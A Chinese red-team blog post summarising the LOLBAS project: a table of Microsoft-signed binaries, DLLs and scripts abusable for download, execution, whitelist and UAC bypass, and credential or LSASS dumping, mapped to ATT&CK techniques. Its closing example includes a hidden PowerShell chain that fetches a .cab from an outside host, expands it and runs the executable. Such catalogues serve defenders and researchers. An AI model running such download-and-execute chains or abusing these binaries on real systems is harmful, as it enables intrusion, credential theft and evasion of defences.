• 我们在哪一颗星上见过 ,以至如此相互思念 ;我们在哪一颗星上相互思念过,以至如此相互深爱
  • 我们在哪一颗星上分别 ,以至如此相互辉映 ;我们在哪一颗星上入睡 ,以至如此唤醒黎明
  • 认识世界 克服困难 洞悉所有 贴近生活 寻找珍爱 感受彼此

红:本地二进制文件和脚本(Living Off The Land Binaries and Scripts)-LOLBin

红蓝对抗 云涯 2年前 (2022-06-07) 1258次浏览

简介

https://lolbas-project.github.io/

https://github.com/LOLBAS-Project/LOLBAS/blob/master/README.md

 

”Living off the land“这个词是由 Christopher Campbell (@obscuresec) 和 Matt Graeber (@mattifestation) 在DerbyCon 3上创造的。LOLBins 一词来自 Twitter 上关于什么叫做二进制文件的讨论,攻击者可以使用这些二进制文件来执行超出其原始目的的操作。Philip Goh (@MathCasualty)提出了 LOLBins。随后进行了一项高度科学的互联网民意调查,并在达成普遍共识(69%)后,该名称被正式命名。Jimmy (@bohops)跟进了 LOLScripts。没有进行民意调查。

这些文件的常见主题标签是:

  • #LOLBin
  • #LOLBins
  • #LOLScript
  • #LOLScripts
  • #LOLLib
  • #LOLLibs

 

LOLBin是翻译为“生活在陆地上的文件”,就是利用白名单文件执行恶意功能。

LOLBin/Lib/脚本必须符合以下要求

1.  Microsoft 签名的文件,可以是操作系统的本机文件,也可以是从 Microsoft 下载的文件

2. 具有额外的“意外”功能。例如白名单绕过

3. 具有对APT或红队有用的功能

有趣的功能可以包括

执行代码

  • 任意代码执行
  • 传递执行其他程序(未签名)或脚本(通过 LOLBin)

编译代码

文件操作

  • 下载
  • 上传
  • 复制

持久性

  • 利用现有 LOLBin 的达到持久性
  • 持久性(例如在 ADS 中隐藏数据,登录时执行)

UAC绕过

凭证盗窃

转储进程内存

监视(例如键盘记录器、网络跟踪)

日志规避/修改

DLL 侧加载/劫持而不被重新定位到文件系统中的其他位置。

 

GTFOBins

这是同类的Unix二进制列表

 

LOLBin列表

https://github.com/TideSec/BypassAntiVirus  有文章逐一分析过

https://www.yuque.com/tidesec/bypassav

 

文件 功能 类型 ATT&CK® Techniques
AppInstaller.exe 下载(Download) 二进制(Binaries) T1105: IngressTool Transfer
Aspnet_Compiler.exe AWL bypass 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
At.exe 执行(Execute) 二进制(Binaries) T1053.002: At
Atbroker.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Bash.exe 执行(Execute)

 

AWL bypass

二进制(Binaries) T1202: Indirect Command Execution
Bitsadmin.exe 备用数据流(Alternate data streams)

 

下载(Download)

 

复制(Copy)

 

执行(Execute)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1105: Ingress Tool Transfer

 

T1218: System Binary Proxy Execution

CertOC.exe 执行(Execute)

 

下载(Download)

二进制(Binaries) T1218: System Binary Proxy Execution

 

T1105: Ingress Tool Transfer

CertReq.exe 下载(Download)

上传(Upload)

二进制(Binaries) T1105: Ingress Tool Transfer
Certutil.exe 下载(Download)

 

备用数据流(Alternate data streams)

 

编码(Encode)

 

解码(Decode)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1564.004: NTFS File Attributes

 

T1027: Obfuscated Files or Information

 

T1140: Deobfuscate/Decode Files or Information

Cmd.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1059.003: Windows Command Shell
Cmdkey.exe Credentials 二进制(Binaries) T1078: Valid Accounts
cmdl32.exe 下载(Download) 二进制(Binaries) T1105: Ingress Tool Transfer
Cmstp.exe 执行(Execute)

 

AWL bypass

二进制(Binaries) T1218.003: CMSTP
ConfigSecurityPolicy.exe 上传(Upload) 二进制(Binaries) T1567: Exfiltration Over Web Service
Conhost.exe 执行(Execute) 二进制(Binaries) T1202: Indirect Command Execution
Control.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1218.002: Control Panel
Csc.exe 编译(Compile) 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Cscript.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1564.004: NTFS File Attributes
DataSvcUtil.exe 上传(Upload) 二进制(Binaries) T1567: Exfiltration Over Web Service
Desktopimgdownldr.exe 下载(Download) 二进制(Binaries) T1105: Ingress Tool Transfer
Dfsvc.exe AWL bypass 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Diantz.exe 备用数据流(Alternate data streams)

 

下载(Download)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1105: Ingress Tool Transfer

Diskshadow.exe 转储(Dump)

 

执行(Execute)

二进制(Binaries) T1003.003: NTDS

 

T1202: Indirect Command Execution

Dnscmd.exe 执行(Execute) 二进制(Binaries) T1543.003: Windows Service
Esentutl.exe 复制(Copy)

 

备用数据流(Alternate data streams)

 

下载(Download)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1564.004: NTFS File Attributes

 

T1003.003: NTDS

Eventvwr.exe UAC bypass 二进制(Binaries) T1548.002: Bypass User Account Control
Expand.exe 下载(Download)

 

复制(Copy)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1564.004: NTFS File Attributes

Explorer.exe 执行(Execute) 二进制(Binaries) T1202: Indirect Command Execution
Extexport.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Extrac32.exe 备用数据流(Alternate data streams)

 

下载(Download)

 

复制(Copy)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1105: Ingress Tool Transfer

Findstr.exe 备用数据流(Alternate data streams)

 

证书(Credentials)

 

下载(Download)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1552.001: Credentials In Files

 

T1105: Ingress Tool Transfer

Finger.exe 下载(Download) 二进制(Binaries) T1105: Ingress Tool Transfer
fltMC.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1562.001: Disable or Modify Tools
Forfiles.exe 执行(Execute)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1202: Indirect Command Execution

 

T1564.004: NTFS File Attributes

http://Ftp.exe 执行(Execute)

 

下载(Download)

二进制(Binaries) T1202: Indirect Command Execution

 

T1105: Ingress Tool Transfer

GfxDownloadWrapper.exe 下载(Download) 二进制(Binaries) T1105: Ingress Tool Transfer
Gpscript.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Hh.exe 下载(Download)

 

执行(Execute)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1218.001: Compiled HTML File

IMEWDBLD.exe 下载(Download) 二进制(Binaries) T1105: Ingress Tool Transfer
Ie4uinit.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Ieexec.exe 下载(Download)

 

执行(Execute)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1218: System Binary Proxy Execution

Ilasm.exe 编译(Compile) 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Infdefaultinstall.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Installutil.exe AWL bypass

 

执行(Execute)

二进制(Binaries) T1218.004: InstallUtil
Jsc.exe 编译(Compile) 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Makecab.exe 备用数据流(Alternate data streams)

 

下载(Download)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1105: Ingress Tool Transfer

Mavinject.exe 执行(Execute)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1218.013: Mavinject

 

T1564.004: NTFS File Attributes

Microsoft.Workflow.Compiler.exe 执行(Execute)

 

AWL bypass

二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Mmc.exe 执行(Execute)

 

UAC bypass

二进制(Binaries) T1218.014: MMC
MpCmdRun.exe 下载(Download)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1564.004: NTFS File Attributes

Msbuild.exe AWL bypass

 

执行(Execute)

二进制(Binaries) T1127.001: MSBuild
Msconfig.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Msdt.exe 执行(Execute)

 

AWL bypass

二进制(Binaries) T1218: System Binary Proxy Execution
Mshta.exe 执行(Execute)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1218.005: Mshta
Msiexec.exe 执行(Execute) 二进制(Binaries) T1218.007: Msiexec
Netsh.exe 执行(Execute) 二进制(Binaries) T1546.007: Netsh Helper DLL
Odbcconf.exe 执行(Execute) 二进制(Binaries) T1218.008: Odbcconf
OfflineScannerShell.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
OneDriveStandaloneUpdater.exe 下载(Download) 二进制(Binaries) T1105: Ingress Tool Transfer
Pcalua.exe 执行(Execute) 二进制(Binaries) T1202: Indirect Command Execution
Pcwrun.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Pktmon.exe 侦擦(Reconnaissance) 二进制(Binaries) T1040: Network Sniffing
Pnputil.exe 执行(Execute) 二进制(Binaries) T1547: Boot or Logon Autostart Execution
Presentationhost.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Print.exe 备用数据流(Alternate data streams)

 

复制(Copy)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1105: Ingress Tool Transfer

PrintBrm.exe 下载(Download)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1105: Ingress Tool Transfer

 

T1564.004: NTFS File Attributes

Psr.exe 侦擦(Reconnaissance) 二进制(Binaries) T1113: Screen Capture
Rasautou.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
rdrleakdiag.exe 转储(Dump) 二进制(Binaries) T1003: OS Credential Dumping

 

T1003.001: LSASS Memory

Reg.exe 备用数据流(Alternate data streams)

 

证书(Credentials)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1003.002: Security Account Manager

Regasm.exe AWL bypass

 

执行(Execute)

二进制(Binaries) T1218.009: Regsvcs/Regasm
Regedit.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1564.004: NTFS File Attributes
Regini.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1564.004: NTFS File Attributes
Register-cimprovider.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Regsvcs.exe 执行(Execute)

 

AWL bypass

二进制(Binaries) T1218.009: Regsvcs/Regasm
Regsvr32.exe AWL bypass

 

执行(Execute)

二进制(Binaries) T1218.010: Regsvr32
Replace.exe 复制(Copy)

 

下载(Download)

二进制(Binaries) T1105: Ingress Tool Transfer
Rpcping.exe 证书(Credentials) 二进制(Binaries) T1003: OS Credential Dumping

 

T1187: Forced Authentication

Rundll32.exe 执行(Execute)

 

备用数据流(Alternate data streams)

二进制(Binaries) T1218.011: Rundll32

 

T1564.004: NTFS File Attributes

Runonce.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Runscripthelper.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Sc.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1564.004: NTFS File Attributes
Schtasks.exe 执行(Execute) 二进制(Binaries) T1053.005: Scheduled Task
Scriptrunner.exe 执行(Execute) 二进制(Binaries) T1202: Indirect Command Execution

 

T1218: System Binary Proxy Execution

SettingSyncHost.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Stordiag.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
SyncAppvPublishingServer.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Ttdinject.exe 执行(Execute) 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Tttracer.exe 执行(Execute)

 

转储(Dump)

二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution

 

T1003: OS Credential Dumping

vbc.exe 编译(Compile) 二进制(Binaries) T1127: Trusted Developer Utilities Proxy Execution
Verclsid.exe 执行(Execute) 二进制(Binaries) T1218.012: Verclsid
Wab.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Wlrmdr.exe 执行(Execute) 二进制(Binaries) T1202: Indirect Command Execution
Wmic.exe 备用数据流(Alternate data streams)

 

执行(Execute)

二进制(Binaries) T1564.004: NTFS File Attributes

 

T1218: System Binary Proxy Execution

WorkFolders.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Wscript.exe 备用数据流(Alternate data streams) 二进制(Binaries) T1564.004: NTFS File Attributes
Wsreset.exe UAC bypass 二进制(Binaries) T1548.002: Bypass User Account Control
wuauclt.exe 执行(Execute) 二进制(Binaries) T1218: System Binary Proxy Execution
Xwizard.exe 执行(Execute)

 

下载(Download)

二进制(Binaries) T1218: System Binary Proxy Execution

 

T1105: Ingress Tool Transfer

Advpack.dll AWL bypass

 

执行(Execute)

库文件(Libraries) T1218.011: Rundll32
Desk.cpl 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Dfshim.dll AWL bypass 库文件(Libraries) T1127: Trusted Developer Utilities Proxy Execution
Ieadvpack.dll AWL bypass

 

执行(Execute)

库文件(Libraries) T1218.011: Rundll32
Ieframe.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Mshtml.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Pcwutl.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Setupapi.dll AWL bypass

 

执行(Execute)

库文件(Libraries) T1218.011: Rundll32
Shdocvw.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Shell32.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Syssetup.dll AWL bypass

 

执行(Execute)

库文件(Libraries) T1218.011: Rundll32
Url.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Zipfldr.dll 执行(Execute) 库文件(Libraries) T1218.011: Rundll32
Comsvcs.dll 转储(Dump) 库文件(Libraries) T1003.001: LSASS Memory
AccCheckConsole.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1218: System Binary Proxy Execution
adplus.exe 转储(Dump) OtherMSBinaries T1003.001: LSASS Memory
AgentExecutor.exe 执行(Execute) OtherMSBinaries T1218: System Binary Proxy Execution
Appvlp.exe 执行(Execute) OtherMSBinaries T1218: System Binary Proxy Execution
Bginfo.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1218: System Binary Proxy Execution
Cdb.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
coregen.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1055: Process Injection

 

T1218: System Binary Proxy Execution

csi.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
DefaultPack.EXE 执行(Execute) OtherMSBinaries T1218: System Binary Proxy Execution
Devtoolslauncher.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
dnx.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Dotnet.exe AWL bypass

 

执行(Execute)

OtherMSBinaries T1218: System Binary Proxy Execution
Dump64.exe 转储(Dump) OtherMSBinaries T1003.001: LSASS Memory
Dxcap.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Excel.exe 下载(Download) OtherMSBinaries T1105: Ingress Tool Transfer
Fsi.exe AWL bypass OtherMSBinaries T1059: Command and Scripting Interpreter
FsiAnyCpu.exe AWL bypass OtherMSBinaries T1059: Command and Scripting Interpreter
Mftrace.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Msdeploy.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1218: System Binary Proxy Execution
msxsl.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1218: System Binary Proxy Execution
ntdsutil.exe 转储(Dump) OtherMSBinaries T1003.003: NTDS
Powerpnt.exe 下载(Download) OtherMSBinaries T1105: Ingress Tool Transfer
Procdump(64).exe 执行(Execute) OtherMSBinaries T1202: Indirect Command Execution
rcsi.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Remote.exe AWL bypass

 

执行(Execute)

OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Sqldumper.exe 转储(Dump) OtherMSBinaries T1003: OS Credential Dumping

 

T1003.001: LSASS Memory

Sqlps.exe 执行(Execute) OtherMSBinaries T1218: System Binary Proxy Execution
SQLToolsPS.exe 执行(Execute) OtherMSBinaries T1218: System Binary Proxy Execution
Squirrel.exe 下载(Download)

 

AWL bypass

 

执行(Execute)

OtherMSBinaries T1218: System Binary Proxy Execution
te.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Tracker.exe 执行(Execute)

 

AWL bypass

OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Update.exe 下载(Download)

 

AWL bypass

 

执行(Execute)

OtherMSBinaries T1218: System Binary Proxy Execution

 

T1547: Boot or Logon Autostart Execution

 

T1070: Indicator Removal on Host

VSIISExeLauncher.exe 执行(Execute) OtherMSBinaries T1218: System Binary Proxy Execution
VisualUiaVerifyNative.exe AWL bypass OtherMSBinaries T1218: System Binary Proxy Execution
vsjitdebugger.exe 执行(Execute) OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Wfc.exe AWL bypass OtherMSBinaries T1127: Trusted Developer Utilities Proxy Execution
Winword.exe 下载(Download) OtherMSBinaries T1105: Ingress Tool Transfer
Wsl.exe 执行(Execute)

 

下载(Download)

OtherMSBinaries T1202: Indirect Command Execution
CL_LoadAssembly.ps1 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution
CL_Mutexverifiers.ps1 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution
CL_Invocation.ps1 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution
Manage-bde.wsf 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution
Pubprn.vbs 执行(Execute) 脚本(Scripts) T1216.001: PubPrn
Syncappvpublishingserver.vbs 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution
UtilityFunctions.ps1 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution
winrm.vbs 执行(Execute)

 

AWL bypass

脚本(Scripts) T1216: System Script Proxy Execution
Pester.bat 执行(Execute) 脚本(Scripts) T1216: System Script Proxy Execution

实例

pcwutl.dll

例1:Start-Process $cmd -windowstyle hidden -ArgumentList “/c rundll32.exe pcwutl.dll,LaunchApplication $cmd”;$cmd = “c:\windows\system32\cmd.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:\users\public\&&powershell iwr -uri https://exchange.oufca.com.au/aspnet_client/test.cab -o test.cab&&expand test.cab abc.exe&&abc.exe”;

例2:rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe


云涯历险记 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:红:本地二进制文件和脚本(Living Off The Land Binaries and Scripts)-LOLBin
喜欢 (0)